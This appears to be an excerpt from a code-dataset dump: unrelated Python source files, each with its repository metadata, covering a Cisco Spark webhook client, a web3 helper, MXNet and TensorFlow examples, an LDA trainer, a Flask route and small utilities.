resource(unicode, str): The resource type for the webhook.
event(unicode, str): The event type for the webhook.
filter(unicode, str): The filter that defines the webhook scope.
secret(unicode, str): secret used to generate payload signature.
Returns:
Webhook: With the details of the created webhook.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(name, basestring)
assert isinstance(targetUrl, basestring)
assert isinstance(resource, basestring)
assert isinstance(event, basestring)
assert filter is None or isinstance(filter, basestring)
assert secret is None or isinstance(secret, basestring)
post_data = {}
post_data[u'name'] = utf8(name)
post_data[u'targetUrl'] = utf8(targetUrl)
post_data[u'resource'] = utf8(resource)
post_data[u'event'] = utf8(event)
if filter:
post_data[u'filter'] = utf8(filter)
if secret:
post_data[u'secret'] = utf8(secret)
# API request
json_obj = self.session.post('webhooks', json=post_data)
# Return a Webhook object created from the response JSON data
return Webhook(json_obj)
def get(self, webhookId):
"""Get the details of a webhook, by ID.
Args:
webhookId(unicode, str): The webhookId of the webhook.
Returns:
Webhook: With the details of the requested webhook.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(webhookId, basestring)
# API request
json_obj = self.session.get('webhooks/' + webhookId)
# Return a Webhook object created from the response JSON data
return Webhook(json_obj)
def update(self, webhookId, **update_attributes):
"""Update details for a webhook.
Args:
webhookId(unicode, str): The webhookId of the webhook to be
updated.
**update_attributes:
name(unicode, str): A user-friendly name for this webhook.
targetUrl(unicode, str): The URL that receives POST requests
for each event.
Returns:
Webhook: With the updated Spark webhook details.
Raises:
AssertionError: If the parameter types are incorrect.
ciscosparkapiException: If an update attribute is not provided.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(webhookId, basestring)
# Process update_attributes keyword arguments
if not update_attributes:
error_message = "At least one **update_attributes keyword " \
"argument must be specified."
raise ciscosparkapiException(error_message)
put_data = {}
for param, value in update_attributes.items():
if isinstance(value, basestring):
value = utf8(value)
put_data[utf8(param)] = value
# API request
json_obj = self.session.post('webhooks/' + webhookId, json=put_data)
# Return a Webhook object created from the response JSON data
return Webhook(json_obj)
def delete(self, webhookId):
"""Delete a webhook.
Args:
webhookId(unicode, str): The webhookId of the webhook to be
deleted.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(webhookId, basestring)
# API request
self.session.delete('webhooks/' + webhookId)
|
[
"chris@cmlccie.com"
] |
chris@cmlccie.com
|
97fa245b8f83144765ac2371741ea382a277a586
|
bc69172516abbad11a53022a13efff54d3f361c0
|
/utils/app.py
|
5c203783bebe0220039a8a0ba8373386218ed05a
|
[] |
no_license
|
abrance/MedicalLeagueChain
|
8501ad5fc4110bbffc1a112a1264da793662ea24
|
61961e95bcee3f55868e2e2265e9f86c843a4500
|
refs/heads/master
| 2023-01-24T21:15:50.022300 | 2020-12-08T05:51:22 | 2020-12-08T05:51:22 | 291,379,314 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,122 |
py
|
import json
from constants import user
from utils.api import w3
from utils.log import logger, log_path
import datetime
"""
此模块提供 web3 ipc接口
"""
class EthInit(object):
def __init__(self):
self.log = {}
def commit(self, method, param, ret):
t = datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
self.log.__setitem__(method, [t, param, ret])
logger.info(ret)
def __del__(self):
t = datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
with open('{}/{}.info'.format(log_path, t), 'a+') as f:
f.write(json.dumps(self.log, indent=4))
def is_address(self, param):
ret = w3.isAddress(param)
self.commit('is_address', param, ret)
return ret
def get_balance(self, param):
account = param
ret = w3.eth.getBalance(account)
self.commit('get_balance', param, ret)
return ret
def keccak(self, param):
# 代替 sha 方法
# >> > Web3.keccak(0x747874)
# >> > Web3.keccak(b'\x74\x78\x74')
# >> > Web3.keccak(hexstr='0x747874')
# >> > Web3.keccak(hexstr='747874')
# >> > Web3.keccak(text='txt')
if type(param) is dict:
ret = w3.keccak(**param)
else:
ret = w3.keccak(param)
self.commit('keccak', param, ret)
return ret
def unlock(self, account, passphrase):
param = (account, passphrase)
ret = w3.geth.personal.unlock_account(account, passphrase)
self.commit('unlock', param, ret)
return ret
@staticmethod
def get_private_key(key_store_file_path, passphrase):
# 2020/12/8 获取私钥
with open(key_store_file_path, "r") as file:
encrypted_key = file.read()
p_key = w3.eth.account.decrypt(encrypted_key, passphrase)
import binascii
p_key = str(binascii.b2a_hex(p_key))
return p_key
if __name__ == '__main__':
a = EthInit()
# a.is_address('0x2cc7fc9f579fd5fed62633548b2ca11bd029f779')
# a.get_balance(user)
# a.keccak()
del a
|
[
"your_email"
] |
your_email
|
f1a9777ec7e33129540ca8a03f8921fd33f2f177
|
94d101ae081c95e3f02fb0a4cabf6b189102a647
|
/env/slurm/examples/tensorflow/example.py
|
b08f48ef4d0cc51f0a045d84c1779bd4fa4db957
|
[] |
no_license
|
sk-unikent/icarus-scripts
|
06ead6cee3628af06ed3e9075905b9396502c7f8
|
e20c2ebcec0df38bc07d032e77412b8ba5dd8c5f
|
refs/heads/master
| 2021-04-27T06:05:57.613400 | 2018-10-02T06:59:45 | 2018-10-02T06:59:45 | 122,606,951 | 0 | 0 | null | 2018-10-02T06:59:46 | 2018-02-23T10:26:50 |
Python
|
UTF-8
|
Python
| false | false | 149 |
py
|
#
# Example Tensorflow Application
#
import tensorflow as tf
hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))
|
[
"s.kelty@kent.ac.uk"
] |
s.kelty@kent.ac.uk
|
25ad96ae411bfd41662e4433ed36402bfc972d03
|
41aafc48b866158953c1af454ad0c9b33f1319c3
|
/symbol/fspherenet.py
|
aa275ff12772d65dac29c386b84ea80381017c68
|
[] |
no_license
|
myknotruby/recognition
|
a1f9a2defabb416091da64b87b8419c8a7f0312a
|
6c20026d5b226ce6e7fd580a408ff11b7f56158e
|
refs/heads/master
| 2022-11-16T23:07:07.158119 | 2020-07-02T02:14:15 | 2020-07-02T02:14:15 | 272,152,804 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,034 |
py
|
import os, sys
import mxnet as mx
import numpy as np
import symbol_utils
import math
#from mxnet.base import _Null
import symbol_utils
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from config import config
withBN = True
bn_mom = 0.9
def conv_branch_pool(data, units, filters, workspace):
body = data
#body = mx.sym.Convolution(data=body, no_bias=False, num_filter=32, kernel=(5, 5), stride=(2,2), pad=(2, 2),
body = mx.sym.Convolution(data=body, no_bias=False, num_filter=24, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(0, 1), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (0, 1)))
body = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (0, 1))
else:
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (0, 1))
for i in xrange(len(units)):
f = filters[i]
idx = 1
if i>=1:
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body, weight = _weight, bias = _bias, num_filter=f, kernel=(3, 3), stride=(2,2), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=body1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
#body1 = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (i+1, idx))
body1 = mx.sym.Activation(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body1, weight=_weight, bias=_bias, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
body1 = mx.sym.BatchNorm(data=body1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
##body1 = mx.sym.LeakyReLU(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
body = mx.sym.Pooling(data = body, global_pool=False, kernel=(2,2), stride=(2,2),pool_type='avg', pooling_convention='full',name='pool%d_%d'%(i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body = mx.sym.Convolution(data=body, weight=_weight, bias=_bias, num_filter=f, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
##body = mx.sym.LeakyReLU(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
body = body1 + body
idx += 1
for j in xrange(units[i]):
_body = mx.sym.Convolution(data=body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=_body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
#_body = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (i+1, idx))
_body = mx.sym.Activation(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
_body = mx.sym.Convolution(data=_body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
_body = mx.sym.BatchNorm(data=_body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
##_body = mx.sym.LeakyReLU(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
body = body+_body
node = len(units)+1
body = mx.sym.Convolution(data=body, no_bias=False, num_filter=512, kernel=(1, 1), stride=(1,1), pad=(0, 0),
name= "conv%d_%d"%(node, 1), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (node, idx)))
#body = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (node, idx))
body = mx.sym.Activation(data=bn, act_type='relu', name="relu%d_%d" % (node, idx))
else:
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (node, idx))
#import pdb; pdb.set_trace()
return body
def conv_main(data, units, filters, workspace):
body = data
body = mx.sym.Convolution(data=body, no_bias=True, num_filter=32, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(0, 1), workspace=workspace)
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (0, 1))
for i in xrange(len(units)):
f = filters[i]
idx = 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body, weight = _weight, bias = _bias, num_filter=f, kernel=(3, 3), stride=(2,2), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body1, weight=_weight, bias=_bias, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
body = mx.sym.Pooling(data = body, global_pool=False, kernel=(2,2), stride=(2,2),pool_type='avg', pooling_convention='full', name='pool%d_%d'%(i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body = mx.sym.Convolution(data=body, weight=_weight, bias=_bias, num_filter=f, kernel=(1, 1), stride=(1,1), pad=(0, 0),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
body = body1 + body
idx += 1
for j in xrange(units[i]):
_body = mx.sym.Convolution(data=body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
_body = mx.sym.Convolution(data=_body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
body = body+_body
return body
def get_symbol():
_dtype = config.dtype
num_classes = config.emb_size
fc_type = 'E' #config.net_output
workspace = config.workspace
num_layers = config.num_layers
if num_layers==64:
units = [3,8,16,3]
filters = [64,128,256,512]
elif num_layers==20:
units = [1,2,4,1]
filters = [64,128,256,512]
#filters = [64, 256, 512, 1024]
elif num_layers==36:
units = [2,4,8,2]
filters = [64,128,256,512]
#filters = [64, 256, 512, 1024]
elif num_layers==44:
units = [3,4,4,4,3]
filters = [16,32,64,128,256]
elif num_layers==60:
units = [3,8,14,3]
filters = [64,128,256,512]
elif num_layers==68:
units = [3,4,8,12,3]
filters = [16,32,64,128,256]
elif num_layers==74:
units = [3,6,8,12,3]
filters = [24,32,64,128,256]
#filters = [32,64,128,256,256]
elif num_layers==104:
units = [3,8,36,3]
filters = [64,128,256,512]
#filters = [64, 256, 512, 1024]
data = mx.symbol.Variable('data')
data = data-127.5
data = data*0.0078125
if _dtype == 'float16':
data = mx.sym.Cast(data, dtype=np.float16)
body = None
if num_layers==44 or num_layers==68 or num_layers==74:
body = conv_branch_pool(data = data, units = units, filters = filters, workspace = workspace)
else:
body = conv_main(data = data, units = units, filters = filters, workspace = workspace)
#_weight = mx.symbol.Variable("fc1_weight", lr_mult=1.0)
#_bias = mx.symbol.Variable("fc1_bias", lr_mult=2.0, wd_mult=0.0)
#fc1 = mx.sym.FullyConnected(data=body, weight=_weight, bias=_bias, num_hidden=num_classes, name='fc1')
if _dtype == 'float16':
body = mx.sym.Cast(body, dtype=np.float16)
fc1 = symbol_utils.get_fc1(body, num_classes, fc_type)
if _dtype == 'float16':
fc1 = mx.sym.Cast(fc1, dtype=np.float32)
#fc1 = mx.sym.Pooling(data = body, global_pool=True, kernel=(2,2), stride=(2,2),pool_type='avg', pooling_convention='full', name='pool_fc1')
return fc1
def init_weights(sym, data_shape_dict, num_layers):
arg_name = sym.list_arguments()
aux_name = sym.list_auxiliary_states()
arg_shape, aaa, aux_shape = sym.infer_shape(**data_shape_dict)
#print(data_shape_dict)
#print(arg_name)
#print(arg_shape)
arg_params = {}
aux_params = None
#print(aaa)
#print(aux_shape)
arg_shape_dict = dict(zip(arg_name, arg_shape))
aux_shape_dict = dict(zip(aux_name, aux_shape))
#print(aux_shape)
#print(aux_params)
#print(arg_shape_dict)
for k,v in arg_shape_dict.iteritems():
if k.startswith('conv') and k.endswith('_weight'):
if not k.find('_1_')>=0:
if num_layers<100:
arg_params[k] = mx.random.normal(0, 0.01, shape=v)
print('init', k)
if k.endswith('_bias'):
arg_params[k] = mx.nd.zeros(shape=v)
print('init', k)
return arg_params, aux_params
|
[
"zhzhaoliang@126.com"
] |
zhzhaoliang@126.com
|
606a16df0456b41332cf3ba90a58e11843c23db5
|
dcc2aca1755516c165f8fc5d3e0bcaac96ddbac6
|
/LDA/LDA_Train.py
|
0476f09897774296705c0f29156a204f2d980a3b
|
[] |
no_license
|
maurercartan/GIGABYTE_FuzzyQuery
|
4fb97c859b293f6cf14e6c8bfad8f81479116568
|
83e8035e37bb7e028dea9740f6b26e1ab94f2a1b
|
refs/heads/master
| 2021-03-01T10:16:12.566919 | 2020-03-08T14:38:56 | 2020-03-08T14:38:56 | 245,776,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,371 |
py
|
__author__ = 'user'
from gensim import corpora, models
import jieba
import os
import configparser
import pickle
import pymysql
import pymysql.cursors
def getCorpus(dbHost,dbUser,dbPassword,dbDatabase,dbTable):
# 匯入檔案內容
config = configparser.ConfigParser()
myINI = os.getcwd()+'\\LDA\\dict.ini'
config.read(myINI,encoding='utf-8')
stopword = os.getcwd()+"\\LDA\\stop_words.txt"
lowFreq = os.getcwd()+"\\LDA\\lowFrequency.txt"
userDefine = os.getcwd()+"\\LDA\\user_define.txt"
courses_name = []
texts_stemmed = []
stopwordList = open(stopword,'r',encoding='utf-8').readlines()[0].split(',')
userDefineList = open(userDefine,'r',encoding='utf-8').readlines()[0].split(',')
symbol = ['+','-','*','/','\\','=','_','(',')','&','^','.','%','$','#','@','!','`','~','+','-','*','/','\','=','_','(',')','&','︿','.',',','%','$','#','@','!','‵','~','\'','"','’',',',' ',' ','’','"','\r\n']
# 加入使用者自定義詞彙
for item in userDefineList:
jieba.add_word(item,999999)
connStr = pymysql.connect(host=dbHost,
user=dbUser,
password=dbPassword,
db=dbDatabase,
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
conn = connStr.cursor()
sql = 'select id,name,text,dir_path from '+dbTable+' where isNew=\'1\';'
conn.execute(sql)
for row in conn:
courses_name.append(row['dir_path']+'/'+row['name'])
# 讀取內容
document = row['text'].lower()
# 結巴分詞(含stopword與標點符號的過濾)
myJ = jieba.cut(document)
new_doc = {} # document的(詞彙list)
# print("id = ",row['id'])
if row['name']!="":
if "id_"+str(row['id']) not in config.sections(): config.add_section("id_"+str(row['id']))
for word in myJ:
word = noSymbo(word,symbol)
if not word in stopwordList \
and not word.isnumeric()\
and len(word)>1:
if word in new_doc.keys():
new_doc[word] += 1
else:
new_doc[word] = 1
for word in new_doc.keys():
config.set("id_"+str(row['id']),word,str(new_doc[word]))
config.write(open(myINI, 'w',encoding='utf-8'))
texts_stemmed.append(new_doc)
conn.close()
conn_2 = connStr.cursor()
sql_2 = "UPDATE info SET isNew = '0' WHERE isNew = '1'"
conn_2.execute(sql_2)
connStr.commit()
conn_2.close()
connStr.close()
# 合併字典
from collections import Counter
all_stems = {}
for item in texts_stemmed:
all_stems = dict(Counter(all_stems)+Counter(item))
# 取出(低頻詞彙,詞頻=1)
for item in all_stems.keys():
if all_stems[item]==1:
with open(lowFreq,'a',encoding='utf-8') as f:
f.write(item+",")
def Training(numTopic=100):
import time
start = time.time()
print("***預處理***")
lowFreq = os.getcwd()+"\\LDA\\lowFrequency.txt"
stems_once = []
f = open(lowFreq,'r',encoding='utf-8')
for item in f.readlines()[0].split(','):
try:
# print(item)
stems_once.append(item)
except:
pass
f.close()
# 去除低頻詞彙(詞頻=1時,則移除)
config = configparser.ConfigParser()
myINI = os.getcwd()+'\\LDA\\dict.ini'
config.read(myINI,encoding='utf-8')
texts = []
courses_id = []
for section in config.sections():
myID = section.replace("id_","")
print(myID)
courses_id.append(myID)
myList = []
for key in config.options(section):
if key not in stems_once:
for i in range(int(config.get(section,key))):
myList.append(key)
texts.append(myList)
print("***花費秒數 = ",round(start-time.time(),5),"***")
print("***訓練LDA模型***")
start = time.time()
# 訓練LDA模型(topic=100)
lda_path = os.getcwd()+'\\LDA\\lda.pkl'
lda_name = os.getcwd()+'\\LDA\\name.pkl'
lda_corpus = os.getcwd()+'\\LDA\\corpus.pkl'
print("***建立詞袋***")
# 建立詞袋
dictionary = corpora.Dictionary(texts)
print("***花費秒數 = ",round(time.time()-start,5),"***")
print("***建立文檔矩陣***")
# 建立文檔矩陣
corpus = [dictionary.doc2bow(text) for text in texts]
print("***花費秒數 = ",round(time.time()-start,5),"***")
print("***計算TF-IDF***")
# 計算TF-IDF
tfidf = models.TfidfModel(corpus)
corpus_tfidf = tfidf[corpus]
lda = models.LdaModel(corpus_tfidf,
id2word=dictionary,
num_topics=numTopic,
gamma_threshold=0.0001,
iterations=1000,
passes=1)
print("***花費秒數 = ",round(time.time()-start,5),"***")
with open(lda_path, 'wb') as f:
pickle.dump(lda, f, pickle.HIGHEST_PROTOCOL)
with open(lda_name, 'wb') as f:
pickle.dump(courses_id, f, pickle.HIGHEST_PROTOCOL)
with open(lda_corpus, 'wb') as f:
pickle.dump(corpus, f, pickle.HIGHEST_PROTOCOL)
print("***訓練完成***")
def noSymbo(word,symbol):
for item in symbol:
while(str(word).__contains__(item)): word = word.replace(item,"")
return word
def main():
config_path = os.getcwd()+'\\config.cfg'
config = configparser.ConfigParser()
config.read(config_path)
dbHost = config.get('ARGUMENT', 'HOST').strip('"')
dbUser = config.get('ARGUMENT', 'USER').strip('"')
dbPassword = config.get('ARGUMENT', 'PASSWORD').strip('"')
dbDatabase = config.get('ARGUMENT', 'DATABASE_NAME').strip('"')
dbTable = config.get('ARGUMENT', 'DATABASE_TABLE').strip('"')
numTopic = config.get('ARGUMENT','NUM_TOPIC').strip('"')
getCorpus(dbHost,dbUser,dbPassword,dbDatabase,dbTable)
Training(numTopic)
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
maurercartan.noreply@github.com
|
10de3e566c9cad31ae3f3f9601990deb0378c7c4
|
f19e8b0c8c5ff38c6bbfce16c6d2ee976c964ffe
|
/tests/wpt/something.py
|
10d52a0c04684fa7ff5b88cee8ec4b7fbe0bbb02
|
[] |
no_license
|
jdm/servo-mock
|
2d5fcffe5781846911844be103b1da3e9177e557
|
a52e82dffac424376031eb8bb5e7129c80eb0dea
|
refs/heads/master
| 2021-04-09T15:07:13.742809 | 2018-03-16T20:36:22 | 2018-03-16T20:36:22 | 125,684,927 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 31 |
py
|
print('this is a python file')
|
[
"josh@joshmatthews.net"
] |
josh@joshmatthews.net
|
e346a931953ea62760ea6dc50e3a102aa937f7cd
|
bf5fd174005c08cc5b616165c2f4f6dc23e4510c
|
/bin/python-config
|
b9211a3f94fc6ca0a85a6904d914769311a784b3
|
[] |
no_license
|
adnanjam/gpa
|
805b204c5b4adf3f6fa09ec19cea84c0925fb484
|
b0fe0931153dea242618c0e635473057e3bf07de
|
refs/heads/master
| 2021-03-13T17:59:13.917922 | 2020-12-21T10:08:50 | 2020-12-21T10:08:50 | 246,698,109 | 0 | 1 | null | 2020-12-21T10:08:52 | 2020-03-11T23:08:56 |
Python
|
UTF-8
|
Python
| false | false | 2,342 |
#!/home/adnan/projects/gpa/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
|
[
"addnan_98@hotmail.com"
] |
addnan_98@hotmail.com
|
|
f5333922296905d8036b63e545886b126daa6b78
|
09dbecd235fb0108d0e64a0be9c40d938fa5155e
|
/itoit/Views/capitalBancaView.py
|
8bca40254ea3cb7741b816c0be4928c199f0d8d0
|
[] |
no_license
|
ItoIT/Smarthack-ItoIT
|
ea0d06fc672413508ea0e409f7e1caf0c3596919
|
405a054f06719a249d29178cbf2a7c1efc1c7145
|
refs/heads/main
| 2023-01-04T01:03:52.628973 | 2020-11-01T09:13:01 | 2020-11-01T09:13:01 | 308,851,461 | 1 | 0 | null | 2020-11-01T00:29:42 | 2020-10-31T09:56:17 |
JavaScript
|
UTF-8
|
Python
| false | false | 767 |
py
|
from flask import render_template, url_for, redirect, request
from flask_login import login_user, current_user, logout_user, login_required
from itoit import app, db
from itoit.Models import models
@app.route("/capitalbanca", methods=['GET'])
def capitalbanca_get():
firm = models.Firm.query.filter(models.Firm.user_id==current_user.id).first()
return render_template("capitalbanca.jinja", user=current_user, firm=firm)
@app.route("/capitalbanca", methods=['POST'])
def capitalbanca_post():
firm = models.Firm.query.filter(models.Firm.user_id==current_user.id).first()
firm.factura_capital = request.files['completatebanca'].read()
firm.feedback = None
db.session.add(firm)
db.session.commit()
return redirect(url_for("acte_get"))
|
[
"48451420+PredaMihaiDragos@users.noreply.github.com"
] |
48451420+PredaMihaiDragos@users.noreply.github.com
|
9af9714d90dbab4214db386ac0e87a3796cbc58d
|
128999141402ebf1170fa806178b00b394136744
|
/Test/test1.py
|
8dd071425883e374e9da7784098045526e10d035
|
[] |
no_license
|
keeees/RaspberryPi
|
46a4389d52d57c9dd09fbbe8d50b87147f112d0c
|
7129f29c52c945d6a929489b19999f6904c3f7b7
|
refs/heads/master
| 2020-09-03T05:25:33.099078 | 2020-03-22T03:24:11 | 2020-03-22T03:24:11 | 219,396,544 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 578 |
py
|
import wget
import time
from ftplib import FTP
clock_start = time.clock()
time_start = time.time()
for i in range(1):
url = 'http://192.168.50.142:8000/test.jpg'
filename = wget.download(url)
clock_end = time.clock()
time_end = time.time()
# time.sleep(0.25)
duration_clock = clock_end - clock_start
print ('clock: start = ',clock_start, ' end = ',clock_end)
print ('clock: duration_clock = ', duration_clock)
duration_time = time_end - time_start
print ('time: start = ',time_start, ' end = ',time_end)
print ('time: duration_time = ', duration_time)
|
[
"kesun5@illinois.edu"
] |
kesun5@illinois.edu
|
1cae6677eccc4f88be48e2943c4890ce8ab007a3
|
b977c156350bdd9361facaa8a0a28a3eab0b2818
|
/acbmc/model/blender/constructing/bone_transform_node_factory.py
|
d77071dfe63610bd70b6da4849c75a683bce17f7
|
[] |
no_license
|
Spinu2b/AnimatedCharacterBlenderModelConstructor
|
0df38578ae6bdfa32e54e909b30a313f70d1a55b
|
134257436e2edc812de8df247b7365bef2663b01
|
refs/heads/master
| 2023-06-06T13:36:15.099556 | 2021-06-20T20:52:48 | 2021-06-20T21:01:52 | 293,935,988 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 446 |
py
|
from acbmc.util.model.transform_node import TransformNode
from acbmc.model.blender.model.armature.bone_transform_node import BoneTransformNode
class BoneTransformNodeFactory:
@staticmethod
def get_from_bind_bone_pose(bone_name: str, bind_bone_pose: TransformNode) -> BoneTransformNode:
result = BoneTransformNode()
result.bone_name = bone_name
result.bone_transform = bind_bone_pose.copy()
return result
|
[
"spinu2b@gmail.com"
] |
spinu2b@gmail.com
|
e01b8a34f7b5f66a12bde734e35f4d172d5c53be
|
84da878d832a36804eb60372225c93fe12cd7e9c
|
/abc/135/a.py
|
dd2db216c4b09ab70e8006aaa98acc852ab364b5
|
[] |
no_license
|
gensasaki/atcoder
|
